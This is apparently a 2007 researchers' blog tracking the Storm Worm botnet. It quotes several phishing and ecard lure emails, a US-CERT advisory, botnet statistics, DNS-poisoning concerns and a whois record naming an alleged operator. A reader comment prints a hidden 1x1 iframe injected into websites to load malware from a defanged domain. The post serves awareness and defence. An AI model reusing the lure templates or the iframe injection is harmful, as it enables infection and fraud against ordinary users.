Dude, what if your wife finds this?!

The latest storm run is now using http and fake urls.

This is actually good news for us, because most spam filters will catch it. Turning off 'html display' in your email client will help you identify tricks like this:

Subject: Dude, what if your wife finds this?

From: <laura@trisection.com>Content-Type: text/html;charset=windows-1252
Content-Transfer-Encoding: 7BIT
Message-Id: <1IP0UT-000TG6-8G@wfvy>Sender: User guzjxoepu <guzjxoepu@wfvy>Date: Sun, 26 Aug 2007 03:36:09 +0900

<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\"><html><body>OMG, what are you doing man. This video of you is all over the net. take a look, lol... <a
href=\"http://xx.xx.x.xxx/\">http://www.youtube.com/watch?v=12xM6esvMXs</a></body></html>


The latest run uses video.exe and displays a static Youtube logo. All ecard.exe, msdataaccess.exe and applet.exe requests will result in a 404 error.

In other news:

We are now submitting our Stormworm IP feeds to Bleeding Edge Threats, and Comcast Communications as well as various private mailing lists and a law enforcement group.

We have captured over 25,000 unique malicious files related to this malware.

Other ISPs are starting to respond to our notifications.

US Cert has issued the following notice:

US-CERT is aware of several new propagation techniques being used by the Storm Worm Trojan to spread. The new variants arrive as either an email message claiming to contain a link to adult pictures, or as credentials for a membership-based website, asking you to login to change your temporary ID and password. The messages contain links to malicious websites that when visited, install malware on the user's system.

US-CERT urges users and administrators to take the following preventative measures to mitigate the security risks:

* Do not follow unsolicited links.
* Configure your web browser as described in the Securing Your Web Browser document.
* Install anti-virus software, and keep its virus signature files up-to-date.
* Refer to the Recognizing and Avoiding Email Scams document for more information on avoiding email scams.
* Refer to the Avoiding Social Engineering and Phishing Attacks document for more information on social engineering attacks.

UPDATE: Sans ISC Post

Stormworm/Peed/Peacom changing templates (again...)

The storm authors must be putting in as much time changing their routine as I am monitoring them.

A few dozen versions of this were in my email box. Thankfully these aren't targeted..yet. That will give me time to update all those security awareness emails.

Welcome,

Here is your membership info for Online Gamers.

Membership Number: 76245793978563
Your Temp. Login ID: user1043
Temorary Password: pu345

Your temporary Login Info will expire in 24 hours. Please login and change it.

Use this link to change your Login info: http://66.107.xx.xxx/

Thank You,
Confirmation Dept.
Online Gamers

Quick Storm Update

We're seeing an increase in storm spam, one spam drop has received over 200 messages in the last 24 hours.

Most are targeted, and many look like they are trying to pass themselves off as casual messages, not just greeting cards.

All the storm infected systems we've visited recently are serving up the new Microsoft Data Access page. If you see this page please close your the browser immediately!

We've updated our stats, click on the links in previous posts for the updated lists of over 18000 unique MD5's, 11,000 unique IPs, 486 name servers, and 418 open resolvers.

The tushove.com domain has been suspended, but 12 others still remain.

Stormworm filename change.

We've seen a few reports of a new ecard, the latest:

Worshipper(funfrog@rehau.com) has created Funny ecard for you
at postcards.org.

To see your custom Funny ecard, simply click on the following link:

http://xx.xx0.60.111/

Send a FREE greeting card from postcards.org whenever you want by visiting us at:
This service is provided and hosted by postcards.org.

when visiting the url, you're greeted with:

To view your ecard, you need to have Microsoft Data Access installed on your computer.

Of course you can click and install "Microsoft Data Access", which is also named msdataaccess.exe. Its trojaned, and joins the storm network.

Storm/Peed email template change

The storm authors have slightly altered their egreeting template, the most recent looks like this:

Family member has created a postcard for you at postcards.com,
the Internet's most popular greeting card service.

Your greeting card ID is: (HEX STRING)

To see your custom greeting card, simply click on the link below:
http://xx.xx.xxx.xxx/?(HEX STRING FROM ABOVE)

Send greeting cards from postcards.com whenever you want by visiting us at:
http://postcards.com/
Copyright (c) 1996-2007 postcards.com All Rights Reserved

The postcard.com links are valid pointers.

Paul got this one over the weekend:

Neighbour(secretariaat.antwer ...@libertysurf.fr) has created Animated postcard for you
at yourgreeting.com.

To see your custom Animated postcard, simply click on the following
Internet address (if your mail program doesn't support this feature
you will need to COPY and PASTE the address into your browser's address box):

http://xxx.xxx.xxx.xxx/?089c03307ff04a3fcb36edbf088
Send a FREE greeting card from yourgreeting.com whenever you want by visiting us at:
http://yourgreeting.com/
This service is provided and hosted by yourgreeting.com.

Storm/Peed Nameserver Update

DISOG researcher Randy Vaughn has identified a new wrinkle with the Stormworm Nameservers. 364 of the identified nameservers are now functioning as open resolvers.

It is likely the storm gang may be preparing poisoned name servers operating behind network perimeters. If they did that they could use network sensitive IPs in order to mask the fact that infected users have had their network settings altered. If the machine owner was aware enough to examine their network settings they might overlook the presence of an IP within their ISP's address space as a DNS IP. I know my initial reaction would be, "oh Grandecom changed the DHCP provided DNS IPs once again", rather than, "hey, that IP doesn't look right." Were I to check the listed, but compromised, name server I would more than likely only verify that CNN went to CNN, and Apple.com went to Apple. I might not think to verify that mybank.com actually went to mybank. Please pay special attention to those SSL Certificates! Storm, all by itself, could cause widely-dispersed financial loss on a large scale; I wouldn't put it past the Storm team to launch targeted phishing attacks in the near future.

Of course there are other, much scarier things these guys could be planning.

I am not a big fan of customer blocks, but I feel this case warrants blocking inbound port 53 (tcp/udp), and outbound port 25 (tcp) traffic immediately.

Jeff Kell reminds us that this could be quite a subtle attack vector weeks or months down the road, even if the machine was cleaned of all malware.

Behold, the power of Storm

As expected, the Storm Botnet has been gaining strength over the last 6 weeks. Current estimates are in the hundreds of thousands, to a million drones.

Stormworm has been our primary focus over the last few weeks as well.

To date, DISOG has uncovered over

14376 unique storm related binaries,
3118 unique Storm Serving IPs,
258 supernode peers,
85 unique nameservers,
and 13 fast flux domains.

In total, we've identified 3420 unique IP addresses that have been under control of the stormworm author(s), and identifying themselves in one form or another. There are likely hundreds of thousands more drones that we are totally unaware of!

One of the storm worm fastflux domains appears to not be privacy hidden. I'm unclear if this is a slip up or a setup, but its interesting!

Domain Name: LTBREW.COM
Registrar: ESTDOMAINS, INC.
Whois Server: whois.estdomains.com
Referral URL: http://www.estdomains.com
Registrant:
Daniel Korwel (noviymoyma@yahoo.com)
N/A
Los-Angeles
CALI,53313
US
Tel. +1.3235212327

Keep posted, we will continue to update this page as we learn more.

Reader Comment (Pre-Site-Change:)

The fallowing code was injected into 4 of my websites:
------------------------------------
\"<iframe src=\"http://kqfloat.xxxcom/ind.php\" alt=\"BYDLOSHKA\"
height=\"1\" width=\"1\"></iframe>\"
------------------------------------
Remove the xxx in the domain name to get the virus/trojan horse in
your computer.
They use several other domains to host the Virus or Trojan Horse. When
I check the Whois all were PrivacyProtected, accept one. snlilac.com
shows the owner: http://www.whois.net/whois_new.cgi?d=snlilac&tld=com
When I search on "Daniel Korwel" in Google i found this news article.

What tells me that the hack of my websites is part of this Storm Botneck.
So I assume they have expanded from email to infiltrating websites to spread out the Worm.